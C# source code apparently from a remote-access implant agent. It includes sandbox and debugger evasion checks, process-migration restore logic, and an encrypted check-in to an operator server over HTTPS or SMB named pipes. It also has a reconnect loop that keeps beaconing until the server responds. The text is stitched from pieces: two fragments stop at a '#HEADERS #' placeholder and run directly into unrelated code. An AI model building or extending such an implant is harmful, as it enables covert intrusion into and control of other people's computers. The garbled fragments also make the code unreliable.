public static void Execute(string json, string cookie, NamedPipeClientStream pipe) { if (containsSandboxArtifacts() || isBadMac() || isDebugged()) { return; } byte[] aeskey; byte[] aesiv; string agentid = ""; Thread servert = null; bool smbstarted = false; bool managed = injectionmanaged; List <string> smblisteners = new List <string>(); Dictionary <string, List <Core.Utility.TaskMsg> > commands = new Dictionary <string, List <Core.Utility.TaskMsg> >(); Random r = new Random(); Core.Utility.AgentIdMsg agentidmsg = Core.Utility.GetAgentId(json); agentid = agentidmsg.agentid; aeskey = Convert.FromBase64String(agentidmsg.sessionkey); aesiv = Convert.FromBase64String(agentidmsg.sessioniv); Core.Utility.CookiedWebClient wc = new Core.Utility.CookiedWebClient(); WebHeaderCollection webHeaderCollection = new WebHeaderCollection(); webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#"); #HEADERS #
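/// <summary>
/// Entry point used after the agent has been moved into a new process.
/// Restores the agent id and AES session key/IV from a base64-encoded
/// <see cref="Core.Utility.AgentState"/> JSON blob, re-creates the transport
/// (named pipe when a pipe name was handed over, otherwise an HTTP client built
/// from the carried cookie), acknowledges the migrate request to the previous
/// process, and then enters <c>Run()</c>.
/// </summary>
/// <param name="arguments">
/// <c>arguments[0]</c> must be the base64-encoded JSON serialisation of
/// <see cref="Core.Utility.AgentState"/>. Any further elements are ignored.
/// </param>
/// <exception cref="ArgumentException">
/// Thrown when <paramref name="arguments"/> is null or empty, or when the payload
/// does not deserialise to an <see cref="Core.Utility.AgentState"/>.
/// </exception>
public void LoadAndRun(string[] arguments)
{
    // The original indexed arguments[0] blindly; fail with a clear message instead of
    // an IndexOutOfRange/NullReference deep inside the base64 decode.
    if (arguments == null || arguments.Length == 0 || string.IsNullOrEmpty(arguments[0]))
    {
        throw new ArgumentException("Expected base64-encoded AgentState JSON as the first argument.", "arguments");
    }

    // NOTE(review): Encoding.Default is the system ANSI code page on .NET Framework, so
    // non-ASCII bytes in the payload would be decoded differently per host. Kept as-is to
    // preserve behaviour; confirm the producer emits UTF-8 before switching to Encoding.UTF8.
    string json = Encoding.Default.GetString(Convert.FromBase64String(arguments[0]));
    Core.Utility.AgentState agentState = new JavaScriptSerializer().Deserialize<Core.Utility.AgentState>(json);
    if (agentState == null)
    {
        throw new ArgumentException("AgentState payload did not deserialise to an AgentState object.", "arguments");
    }

    // Identity and session key material carried over from the previous process.
    agentid = agentState.Agentid;
    aeskey = Convert.FromBase64String(agentState.sessionkey);
    aesiv = Convert.FromBase64String(agentState.sessioniv);

    // Transport: a pipe name means we talk to the parent over the named pipe,
    // otherwise reuse the HTTP session cookie against the configured host.
    if (agentState.pipename != null)
    {
        this.pipe = CreatePipeClient(agentState.pipename);
    }
    else
    {
        this.wc = CreateWebClient(agentState.cookie, host);
    }

    // Reply to the task that requested the migration. A throw-away TaskMsg is
    // needed only because the responder keys the reply on Instanceid.
    Core.Utility.TaskMsg migrateTask = new Core.Utility.TaskMsg();
    migrateTask.Instanceid = agentState.RequestInstanceid;
    Execution.CommandExecuter responder = new Execution.CommandExecuter(migrateTask, this);
    string output = string.Format("[*] Agent successfully migrated to {0}", Process.GetCurrentProcess().ProcessName);
    responder.SendResponse(output);

    Run();
}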
private Core.Utility.CookiedWebClient CreateWebClient(string cookie, string host) { Core.Utility.CookiedWebClient wc = new Core.Utility.CookiedWebClient(); WebHeaderCollection webHeaderCollection = new WebHeaderCollection(); webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#"); #HEADERS #
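/// <summary>
/// Initialises a worker from the agent-id message JSON, builds the HTTP client
/// and performs the initial check-in over the named pipe when one was supplied,
/// otherwise over HTTPS to a randomly chosen configured POST page.
/// </summary>
/// <param name="json">JSON accepted by <c>Core.Utility.GetAgentId</c>; supplies agent id, session key and IV.</param>
/// <param name="cookie">Session cookie handed to <c>CreateWebClient</c>.</param>
/// <param name="pipe">Connected pipe client for SMB mode, or null for HTTP mode.</param>
public Worker(string json, string cookie, NamedPipeClientStream pipe)
{
    this.pipe = pipe;

    // Identity and AES session material come from the agent-id message.
    Core.Utility.AgentIdMsg idMsg = Core.Utility.GetAgentId(json);
    agentid = idMsg.agentid;
    aeskey = Convert.FromBase64String(idMsg.sessionkey);
    aesiv = Convert.FromBase64String(idMsg.sessioniv);

    // Created unconditionally, as in the original, so that any member relying on
    // this.wc being set in SMB mode keeps working. NOTE(review): confirm whether
    // SMB-only workers actually need it before making this conditional.
    this.wc = CreateWebClient(cookie, host);

    if (this.pipe != null)
    {
        Core.Utility.SendCheckinSMB(agentid, aeskey, aesiv, this.pipe);
    }
    else
    {
        // The check-in URL is only meaningful on the HTTP path, so it is built here
        // rather than for every worker (the original also left an unused Random behind).
        Random picker = new Random();
        string checkinUrl = String.Format("https://{0}:{1}/{2}", host, port, pagepost[picker.Next(pagepost.Length)]);
        Core.Utility.SendCheckinHttp(agentid, aeskey, aesiv, checkinUrl, param, wc);
    }
}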
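/// <summary>
/// Re-establishes the HTTP session by retrying the check-in until one attempt
/// completes without throwing. Between attempts (and once more after success,
/// matching the original timing) the thread sleeps for <c>GetDelay()</c> seconds.
/// Failures are swallowed on purpose: an unreachable server is the expected case
/// here, not an error to surface.
/// </summary>
/// <param name="agentid">Agent identifier sent with the check-in.</param>
/// <param name="aeskey">AES session key.</param>
/// <param name="aesiv">AES session IV.</param>
/// <param name="param">Request parameter name forwarded to <c>SendCheckinHttp</c>.</param>
/// <param name="wc">Web client carrying the session cookie.</param>
private void Reconnect(string agentid, byte[] aeskey, byte[] aesiv, string param, Core.Utility.CookiedWebClient wc)
{
    // Only the HTTP transport can be re-established here. In the original the
    // pipe test sat inside the loop, so with a pipe set the exit condition could
    // never be met and the thread slept forever. Return instead of spinning.
    if (this.pipe != null)
    {
        return;
    }

    bool connected = false;
    while (!connected)
    {
        try
        {
            // Rotate across the configured POST pages on every attempt.
            string checkinUrl = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)]);
            Core.Utility.SendCheckinHttp(agentid, aeskey, aesiv, checkinUrl, param, wc);
            connected = true;
        }
        catch (Exception)
        {
            // Best-effort beacon: network, TLS or server-side failures all mean
            // "try again after the delay". Deliberately not rethrown.
        }

        // GetDelay() is defined elsewhere in the class and is treated as seconds.
        // The sleep also runs after a successful attempt, as the original did.
        int delaySeconds = GetDelay();
        Thread.Sleep(delaySeconds * 1000);
    }
}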